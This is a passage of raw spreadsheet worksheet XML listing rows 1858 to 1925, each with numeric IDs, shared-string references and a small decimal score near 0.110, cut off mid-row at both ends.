    </row>
    <row r="1858" ht="15.75" customHeight="1">
      <c r="A1858" s="1">
        <v>22763.0</v>
      </c>
      <c r="B1858" s="2">
        <v>4.4802338E7</v>
      </c>
      <c r="C1858" s="2" t="s">
        <v>1704</v>
      </c>
      <c r="D1858" s="2">
        <v>1.0</v>
      </c>
      <c r="E1858" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1858" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1859" ht="15.75" customHeight="1">
      <c r="A1859" s="1">
        <v>22802.0</v>
      </c>
      <c r="B1859" s="2">
        <v>4.5716328E7</v>
      </c>
      <c r="C1859" s="2" t="s">
        <v>1705</v>
      </c>
      <c r="D1859" s="2">
        <v>1.0</v>
      </c>
      <c r="E1859" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1859" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1860" ht="15.75" customHeight="1">
      <c r="A1860" s="1">
        <v>23380.0</v>
      </c>
      <c r="B1860" s="2">
        <v>5.5533865E7</v>
      </c>
      <c r="C1860" s="2" t="s">
        <v>1706</v>
      </c>
      <c r="D1860" s="2">
        <v>1.0</v>
      </c>
      <c r="E1860" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1860" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1861" ht="15.75" customHeight="1">
      <c r="A1861" s="1">
        <v>23495.0</v>
      </c>
      <c r="B1861" s="2">
        <v>5.7578067E7</v>
      </c>
      <c r="C1861" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="D1861" s="2">
        <v>1.0</v>
      </c>
      <c r="E1861" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1861" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1862" ht="15.75" customHeight="1">
      <c r="A1862" s="1">
        <v>23570.0</v>
      </c>
      <c r="B1862" s="2">
        <v>6191000.0</v>
      </c>
      <c r="C1862" s="2" t="s">
        <v>1708</v>
      </c>
      <c r="D1862" s="2">
        <v>1.0</v>
      </c>
      <c r="E1862" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1862" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1863" ht="15.75" customHeight="1">
      <c r="A1863" s="1">
        <v>23767.0</v>
      </c>
      <c r="B1863" s="2">
        <v>7539256.0</v>
      </c>
      <c r="C1863" s="2" t="s">
        <v>1709</v>
      </c>
      <c r="D1863" s="2">
        <v>1.0</v>
      </c>
      <c r="E1863" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1863" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1864" ht="15.75" customHeight="1">
      <c r="A1864" s="1">
        <v>24069.0</v>
      </c>
      <c r="B1864" s="2">
        <v>9662326.0</v>
      </c>
      <c r="C1864" s="2" t="s">
        <v>1710</v>
      </c>
      <c r="D1864" s="2">
        <v>1.0</v>
      </c>
      <c r="E1864" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1864" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1865" ht="15.75" customHeight="1">
      <c r="A1865" s="1">
        <v>24315.0</v>
      </c>
      <c r="B1865" s="2">
        <v>1.0604538E7</v>
      </c>
      <c r="C1865" s="2" t="s">
        <v>1711</v>
      </c>
      <c r="D1865" s="2">
        <v>1.0</v>
      </c>
      <c r="E1865" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1865" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1866" ht="15.75" customHeight="1">
      <c r="A1866" s="1">
        <v>24756.0</v>
      </c>
      <c r="B1866" s="2">
        <v>1.1816895E7</v>
      </c>
      <c r="C1866" s="2" t="s">
        <v>1712</v>
      </c>
      <c r="D1866" s="2">
        <v>1.0</v>
      </c>
      <c r="E1866" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1866" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1867" ht="15.75" customHeight="1">
      <c r="A1867" s="1">
        <v>24794.0</v>
      </c>
      <c r="B1867" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C1867" s="2" t="s">
        <v>1713</v>
      </c>
      <c r="D1867" s="2">
        <v>1.0</v>
      </c>
      <c r="E1867" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1867" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1868" ht="15.75" customHeight="1">
      <c r="A1868" s="1">
        <v>25101.0</v>
      </c>
      <c r="B1868" s="2">
        <v>1.2949408E7</v>
      </c>
      <c r="C1868" s="2" t="s">
        <v>1714</v>
      </c>
      <c r="D1868" s="2">
        <v>1.0</v>
      </c>
      <c r="E1868" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1868" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1869" ht="15.75" customHeight="1">
      <c r="A1869" s="1">
        <v>25109.0</v>
      </c>
      <c r="B1869" s="2">
        <v>1.2965435E7</v>
      </c>
      <c r="C1869" s="2" t="s">
        <v>1715</v>
      </c>
      <c r="D1869" s="2">
        <v>1.0</v>
      </c>
      <c r="E1869" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1869" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1870" ht="15.75" customHeight="1">
      <c r="A1870" s="1">
        <v>25501.0</v>
      </c>
      <c r="B1870" s="2">
        <v>1.412128E7</v>
      </c>
      <c r="C1870" s="2" t="s">
        <v>1716</v>
      </c>
      <c r="D1870" s="2">
        <v>1.0</v>
      </c>
      <c r="E1870" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1870" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1871" ht="15.75" customHeight="1">
      <c r="A1871" s="1">
        <v>25577.0</v>
      </c>
      <c r="B1871" s="2">
        <v>1.4334202E7</v>
      </c>
      <c r="C1871" s="2" t="s">
        <v>1688</v>
      </c>
      <c r="D1871" s="2">
        <v>1.0</v>
      </c>
      <c r="E1871" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1871" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1872" ht="15.75" customHeight="1">
      <c r="A1872" s="1">
        <v>25750.0</v>
      </c>
      <c r="B1872" s="2">
        <v>1.4600289E7</v>
      </c>
      <c r="C1872" s="2" t="s">
        <v>1717</v>
      </c>
      <c r="D1872" s="2">
        <v>1.0</v>
      </c>
      <c r="E1872" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1872" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1873" ht="15.75" customHeight="1">
      <c r="A1873" s="1">
        <v>25867.0</v>
      </c>
      <c r="B1873" s="2">
        <v>1.4891616E7</v>
      </c>
      <c r="C1873" s="2" t="s">
        <v>1718</v>
      </c>
      <c r="D1873" s="2">
        <v>1.0</v>
      </c>
      <c r="E1873" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1873" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1874" ht="15.75" customHeight="1">
      <c r="A1874" s="1">
        <v>25948.0</v>
      </c>
      <c r="B1874" s="2">
        <v>1.5238696E7</v>
      </c>
      <c r="C1874" s="2" t="s">
        <v>1719</v>
      </c>
      <c r="D1874" s="2">
        <v>1.0</v>
      </c>
      <c r="E1874" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1874" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1875" ht="15.75" customHeight="1">
      <c r="A1875" s="1">
        <v>26047.0</v>
      </c>
      <c r="B1875" s="2">
        <v>1.5480661E7</v>
      </c>
      <c r="C1875" s="2" t="s">
        <v>1720</v>
      </c>
      <c r="D1875" s="2">
        <v>1.0</v>
      </c>
      <c r="E1875" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1875" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1876" ht="15.75" customHeight="1">
      <c r="A1876" s="1">
        <v>26612.0</v>
      </c>
      <c r="B1876" s="2">
        <v>1.8017469E7</v>
      </c>
      <c r="C1876" s="2" t="s">
        <v>1721</v>
      </c>
      <c r="D1876" s="2">
        <v>1.0</v>
      </c>
      <c r="E1876" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1876" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1877" ht="15.75" customHeight="1">
      <c r="A1877" s="1">
        <v>27184.0</v>
      </c>
      <c r="B1877" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C1877" s="2" t="s">
        <v>1722</v>
      </c>
      <c r="D1877" s="2">
        <v>1.0</v>
      </c>
      <c r="E1877" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1877" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1878" ht="15.75" customHeight="1">
      <c r="A1878" s="1">
        <v>27376.0</v>
      </c>
      <c r="B1878" s="2">
        <v>2.170095E7</v>
      </c>
      <c r="C1878" s="2" t="s">
        <v>1695</v>
      </c>
      <c r="D1878" s="2">
        <v>1.0</v>
      </c>
      <c r="E1878" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1878" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1879" ht="15.75" customHeight="1">
      <c r="A1879" s="1">
        <v>28088.0</v>
      </c>
      <c r="B1879" s="2">
        <v>2.4642923E7</v>
      </c>
      <c r="C1879" s="2" t="s">
        <v>1697</v>
      </c>
      <c r="D1879" s="2">
        <v>1.0</v>
      </c>
      <c r="E1879" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1879" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1880" ht="15.75" customHeight="1">
      <c r="A1880" s="1">
        <v>28172.0</v>
      </c>
      <c r="B1880" s="2">
        <v>2.4977358E7</v>
      </c>
      <c r="C1880" s="2" t="s">
        <v>1723</v>
      </c>
      <c r="D1880" s="2">
        <v>1.0</v>
      </c>
      <c r="E1880" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1880" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1881" ht="15.75" customHeight="1">
      <c r="A1881" s="1">
        <v>28314.0</v>
      </c>
      <c r="B1881" s="2">
        <v>2.570222E7</v>
      </c>
      <c r="C1881" s="2" t="s">
        <v>1724</v>
      </c>
      <c r="D1881" s="2">
        <v>1.0</v>
      </c>
      <c r="E1881" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1881" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1882" ht="15.75" customHeight="1">
      <c r="A1882" s="1">
        <v>28793.0</v>
      </c>
      <c r="B1882" s="2">
        <v>2.8536869E7</v>
      </c>
      <c r="C1882" s="2" t="s">
        <v>1725</v>
      </c>
      <c r="D1882" s="2">
        <v>1.0</v>
      </c>
      <c r="E1882" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1882" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1883" ht="15.75" customHeight="1">
      <c r="A1883" s="1">
        <v>29157.0</v>
      </c>
      <c r="B1883" s="2">
        <v>3.0618919E7</v>
      </c>
      <c r="C1883" s="2" t="s">
        <v>1726</v>
      </c>
      <c r="D1883" s="2">
        <v>1.0</v>
      </c>
      <c r="E1883" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1883" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1884" ht="15.75" customHeight="1">
      <c r="A1884" s="1">
        <v>29349.0</v>
      </c>
      <c r="B1884" s="2">
        <v>3.1506317E7</v>
      </c>
      <c r="C1884" s="2" t="s">
        <v>1727</v>
      </c>
      <c r="D1884" s="2">
        <v>1.0</v>
      </c>
      <c r="E1884" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1884" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1885" ht="15.75" customHeight="1">
      <c r="A1885" s="1">
        <v>29376.0</v>
      </c>
      <c r="B1885" s="2">
        <v>3.1746659E7</v>
      </c>
      <c r="C1885" s="2" t="s">
        <v>1728</v>
      </c>
      <c r="D1885" s="2">
        <v>1.0</v>
      </c>
      <c r="E1885" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1885" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1886" ht="15.75" customHeight="1">
      <c r="A1886" s="1">
        <v>30052.0</v>
      </c>
      <c r="B1886" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C1886" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="D1886" s="2">
        <v>1.0</v>
      </c>
      <c r="E1886" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1886" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1887" ht="15.75" customHeight="1">
      <c r="A1887" s="1">
        <v>30200.0</v>
      </c>
      <c r="B1887" s="2">
        <v>3.7278972E7</v>
      </c>
      <c r="C1887" s="2" t="s">
        <v>1730</v>
      </c>
      <c r="D1887" s="2">
        <v>1.0</v>
      </c>
      <c r="E1887" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1887" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1888" ht="15.75" customHeight="1">
      <c r="A1888" s="1">
        <v>30431.0</v>
      </c>
      <c r="B1888" s="2">
        <v>3.9027866E7</v>
      </c>
      <c r="C1888" s="2" t="s">
        <v>1731</v>
      </c>
      <c r="D1888" s="2">
        <v>1.0</v>
      </c>
      <c r="E1888" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1888" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1889" ht="15.75" customHeight="1">
      <c r="A1889" s="1">
        <v>30470.0</v>
      </c>
      <c r="B1889" s="2">
        <v>3.9543384E7</v>
      </c>
      <c r="C1889" s="2" t="s">
        <v>1732</v>
      </c>
      <c r="D1889" s="2">
        <v>1.0</v>
      </c>
      <c r="E1889" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1889" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1890" ht="15.75" customHeight="1">
      <c r="A1890" s="1">
        <v>30660.0</v>
      </c>
      <c r="B1890" s="2">
        <v>4.2153344E7</v>
      </c>
      <c r="C1890" s="2" t="s">
        <v>1703</v>
      </c>
      <c r="D1890" s="2">
        <v>1.0</v>
      </c>
      <c r="E1890" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1890" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1891" ht="15.75" customHeight="1">
      <c r="A1891" s="1">
        <v>30702.0</v>
      </c>
      <c r="B1891" s="2">
        <v>4.2615289E7</v>
      </c>
      <c r="C1891" s="2" t="s">
        <v>1733</v>
      </c>
      <c r="D1891" s="2">
        <v>1.0</v>
      </c>
      <c r="E1891" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1891" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1892" ht="15.75" customHeight="1">
      <c r="A1892" s="1">
        <v>30743.0</v>
      </c>
      <c r="B1892" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C1892" s="2" t="s">
        <v>1734</v>
      </c>
      <c r="D1892" s="2">
        <v>1.0</v>
      </c>
      <c r="E1892" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1892" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1893" ht="15.75" customHeight="1">
      <c r="A1893" s="1">
        <v>30745.0</v>
      </c>
      <c r="B1893" s="2">
        <v>4.405437E7</v>
      </c>
      <c r="C1893" s="2" t="s">
        <v>1735</v>
      </c>
      <c r="D1893" s="2">
        <v>1.0</v>
      </c>
      <c r="E1893" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1893" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1894" ht="15.75" customHeight="1">
      <c r="A1894" s="1">
        <v>30994.0</v>
      </c>
      <c r="B1894" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C1894" s="2" t="s">
        <v>1736</v>
      </c>
      <c r="D1894" s="2">
        <v>1.0</v>
      </c>
      <c r="E1894" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1894" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1895" ht="15.75" customHeight="1">
      <c r="A1895" s="1">
        <v>31379.0</v>
      </c>
      <c r="B1895" s="2">
        <v>4995756.0</v>
      </c>
      <c r="C1895" s="2" t="s">
        <v>1737</v>
      </c>
      <c r="D1895" s="2">
        <v>1.0</v>
      </c>
      <c r="E1895" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1895" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1896" ht="15.75" customHeight="1">
      <c r="A1896" s="1">
        <v>31389.0</v>
      </c>
      <c r="B1896" s="2">
        <v>4998403.0</v>
      </c>
      <c r="C1896" s="2" t="s">
        <v>1738</v>
      </c>
      <c r="D1896" s="2">
        <v>1.0</v>
      </c>
      <c r="E1896" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1896" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1897" ht="15.75" customHeight="1">
      <c r="A1897" s="1">
        <v>32041.0</v>
      </c>
      <c r="B1897" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C1897" s="2" t="s">
        <v>1739</v>
      </c>
      <c r="D1897" s="2">
        <v>1.0</v>
      </c>
      <c r="E1897" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1897" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1898" ht="15.75" customHeight="1">
      <c r="A1898" s="1">
        <v>32327.0</v>
      </c>
      <c r="B1898" s="2">
        <v>5.5773376E7</v>
      </c>
      <c r="C1898" s="2" t="s">
        <v>1740</v>
      </c>
      <c r="D1898" s="2">
        <v>1.0</v>
      </c>
      <c r="E1898" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1898" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1899" ht="15.75" customHeight="1">
      <c r="A1899" s="1">
        <v>32387.0</v>
      </c>
      <c r="B1899" s="2">
        <v>5.6199578E7</v>
      </c>
      <c r="C1899" s="2" t="s">
        <v>1741</v>
      </c>
      <c r="D1899" s="2">
        <v>1.0</v>
      </c>
      <c r="E1899" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1899" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1900" ht="15.75" customHeight="1">
      <c r="A1900" s="1">
        <v>32556.0</v>
      </c>
      <c r="B1900" s="2">
        <v>5.7578066E7</v>
      </c>
      <c r="C1900" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="D1900" s="2">
        <v>1.0</v>
      </c>
      <c r="E1900" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1900" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1901" ht="15.75" customHeight="1">
      <c r="A1901" s="1">
        <v>32816.0</v>
      </c>
      <c r="B1901" s="2">
        <v>6190999.0</v>
      </c>
      <c r="C1901" s="2" t="s">
        <v>1708</v>
      </c>
      <c r="D1901" s="2">
        <v>1.0</v>
      </c>
      <c r="E1901" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1901" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1902" ht="15.75" customHeight="1">
      <c r="A1902" s="1">
        <v>33156.0</v>
      </c>
      <c r="B1902" s="2">
        <v>7077981.0</v>
      </c>
      <c r="C1902" s="2" t="s">
        <v>1742</v>
      </c>
      <c r="D1902" s="2">
        <v>1.0</v>
      </c>
      <c r="E1902" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1902" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1903" ht="15.75" customHeight="1">
      <c r="A1903" s="1">
        <v>33183.0</v>
      </c>
      <c r="B1903" s="2">
        <v>7109005.0</v>
      </c>
      <c r="C1903" s="2" t="s">
        <v>1743</v>
      </c>
      <c r="D1903" s="2">
        <v>1.0</v>
      </c>
      <c r="E1903" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1903" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1904" ht="15.75" customHeight="1">
      <c r="A1904" s="1">
        <v>33241.0</v>
      </c>
      <c r="B1904" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C1904" s="2" t="s">
        <v>1744</v>
      </c>
      <c r="D1904" s="2">
        <v>1.0</v>
      </c>
      <c r="E1904" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1904" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1905" ht="15.75" customHeight="1">
      <c r="A1905" s="1">
        <v>33321.0</v>
      </c>
      <c r="B1905" s="2">
        <v>7539255.0</v>
      </c>
      <c r="C1905" s="2" t="s">
        <v>1709</v>
      </c>
      <c r="D1905" s="2">
        <v>1.0</v>
      </c>
      <c r="E1905" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1905" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1906" ht="15.75" customHeight="1">
      <c r="A1906" s="1">
        <v>33575.0</v>
      </c>
      <c r="B1906" s="2">
        <v>8262946.0</v>
      </c>
      <c r="C1906" s="2" t="s">
        <v>1745</v>
      </c>
      <c r="D1906" s="2">
        <v>1.0</v>
      </c>
      <c r="E1906" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1906" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1907" ht="15.75" customHeight="1">
      <c r="A1907" s="1">
        <v>33818.0</v>
      </c>
      <c r="B1907" s="2">
        <v>8906166.0</v>
      </c>
      <c r="C1907" s="2" t="s">
        <v>1746</v>
      </c>
      <c r="D1907" s="2">
        <v>1.0</v>
      </c>
      <c r="E1907" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1907" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1908" ht="15.75" customHeight="1">
      <c r="A1908" s="1">
        <v>34007.0</v>
      </c>
      <c r="B1908" s="2">
        <v>9487308.0</v>
      </c>
      <c r="C1908" s="2" t="s">
        <v>1747</v>
      </c>
      <c r="D1908" s="2">
        <v>1.0</v>
      </c>
      <c r="E1908" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1908" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1909" ht="15.75" customHeight="1">
      <c r="A1909" s="1">
        <v>34011.0</v>
      </c>
      <c r="B1909" s="2">
        <v>9510613.0</v>
      </c>
      <c r="C1909" s="2" t="s">
        <v>1748</v>
      </c>
      <c r="D1909" s="2">
        <v>1.0</v>
      </c>
      <c r="E1909" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1909" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1910" ht="15.75" customHeight="1">
      <c r="A1910" s="1">
        <v>34065.0</v>
      </c>
      <c r="B1910" s="2">
        <v>9627707.0</v>
      </c>
      <c r="C1910" s="2" t="s">
        <v>1749</v>
      </c>
      <c r="D1910" s="2">
        <v>1.0</v>
      </c>
      <c r="E1910" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1910" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="1911" ht="15.75" customHeight="1">
      <c r="A1911" s="1">
        <v>5291.0</v>
      </c>
      <c r="B1911" s="2">
        <v>4.5207113E7</v>
      </c>
      <c r="C1911" s="2" t="s">
        <v>1750</v>
      </c>
      <c r="D1911" s="2">
        <v>1.0</v>
      </c>
      <c r="E1911" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1911" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1912" ht="15.75" customHeight="1">
      <c r="A1912" s="1">
        <v>7459.0</v>
      </c>
      <c r="B1912" s="2">
        <v>5.1238857E7</v>
      </c>
      <c r="C1912" s="2" t="s">
        <v>1751</v>
      </c>
      <c r="D1912" s="2">
        <v>1.0</v>
      </c>
      <c r="E1912" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1912" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1913" ht="15.75" customHeight="1">
      <c r="A1913" s="1">
        <v>12180.0</v>
      </c>
      <c r="B1913" s="2">
        <v>2.7466256E7</v>
      </c>
      <c r="C1913" s="2" t="s">
        <v>1752</v>
      </c>
      <c r="D1913" s="2">
        <v>1.0</v>
      </c>
      <c r="E1913" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1913" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1914" ht="15.75" customHeight="1">
      <c r="A1914" s="1">
        <v>15442.0</v>
      </c>
      <c r="B1914" s="2">
        <v>4.3002696E7</v>
      </c>
      <c r="C1914" s="2" t="s">
        <v>1753</v>
      </c>
      <c r="D1914" s="2">
        <v>1.0</v>
      </c>
      <c r="E1914" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1914" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1915" ht="15.75" customHeight="1">
      <c r="A1915" s="1">
        <v>16574.0</v>
      </c>
      <c r="B1915" s="2">
        <v>4.690673E7</v>
      </c>
      <c r="C1915" s="2" t="s">
        <v>1754</v>
      </c>
      <c r="D1915" s="2">
        <v>1.0</v>
      </c>
      <c r="E1915" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1915" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1916" ht="15.75" customHeight="1">
      <c r="A1916" s="1">
        <v>20128.0</v>
      </c>
      <c r="B1916" s="2">
        <v>1.0051236E7</v>
      </c>
      <c r="C1916" s="2" t="s">
        <v>1755</v>
      </c>
      <c r="D1916" s="2">
        <v>1.0</v>
      </c>
      <c r="E1916" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1916" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1917" ht="15.75" customHeight="1">
      <c r="A1917" s="1">
        <v>23662.0</v>
      </c>
      <c r="B1917" s="2">
        <v>6838545.0</v>
      </c>
      <c r="C1917" s="2" t="s">
        <v>1756</v>
      </c>
      <c r="D1917" s="2">
        <v>1.0</v>
      </c>
      <c r="E1917" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1917" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1918" ht="15.75" customHeight="1">
      <c r="A1918" s="1">
        <v>24725.0</v>
      </c>
      <c r="B1918" s="2">
        <v>1.1714093E7</v>
      </c>
      <c r="C1918" s="2" t="s">
        <v>1757</v>
      </c>
      <c r="D1918" s="2">
        <v>1.0</v>
      </c>
      <c r="E1918" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1918" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1919" ht="15.75" customHeight="1">
      <c r="A1919" s="1">
        <v>28780.0</v>
      </c>
      <c r="B1919" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C1919" s="2" t="s">
        <v>1758</v>
      </c>
      <c r="D1919" s="2">
        <v>1.0</v>
      </c>
      <c r="E1919" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1919" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1920" ht="15.75" customHeight="1">
      <c r="A1920" s="1">
        <v>30675.0</v>
      </c>
      <c r="B1920" s="2">
        <v>4.2246074E7</v>
      </c>
      <c r="C1920" s="2" t="s">
        <v>1759</v>
      </c>
      <c r="D1920" s="2">
        <v>1.0</v>
      </c>
      <c r="E1920" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1920" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1921" ht="15.75" customHeight="1">
      <c r="A1921" s="1">
        <v>33669.0</v>
      </c>
      <c r="B1921" s="2">
        <v>8420432.0</v>
      </c>
      <c r="C1921" s="2" t="s">
        <v>1760</v>
      </c>
      <c r="D1921" s="2">
        <v>1.0</v>
      </c>
      <c r="E1921" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1921" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1922" ht="15.75" customHeight="1">
      <c r="A1922" s="1">
        <v>33719.0</v>
      </c>
      <c r="B1922" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C1922" s="2" t="s">
        <v>1761</v>
      </c>
      <c r="D1922" s="2">
        <v>1.0</v>
      </c>
      <c r="E1922" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1922" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="1923" ht="15.75" customHeight="1">
      <c r="A1923" s="1">
        <v>18247.0</v>
      </c>
      <c r="B1923" s="2">
        <v>5.2144673E7</v>
      </c>
      <c r="C1923" s="2" t="s">
        <v>1762</v>
      </c>
      <c r="D1923" s="2">
        <v>1.0</v>
      </c>
      <c r="E1923" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1923" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="1924" ht="15.75" customHeight="1">
      <c r="A1924" s="1">
        <v>23541.0</v>
      </c>
      <c r="B1924" s="2">
        <v>5966522.0</v>
      </c>
      <c r="C1924" s="2" t="s">
        <v>1488</v>
      </c>
      <c r="D1924" s="2">
        <v>1.0</v>
      </c>
      <c r="E1924" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1924" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="1925" ht="15.75" customHeight="1">
      <c r="A1925" s="1">
        <v>25968.0</v>
      </c>
      <c r="B1925" s="2">
        <v>1.5271469E7</v>
      </c>
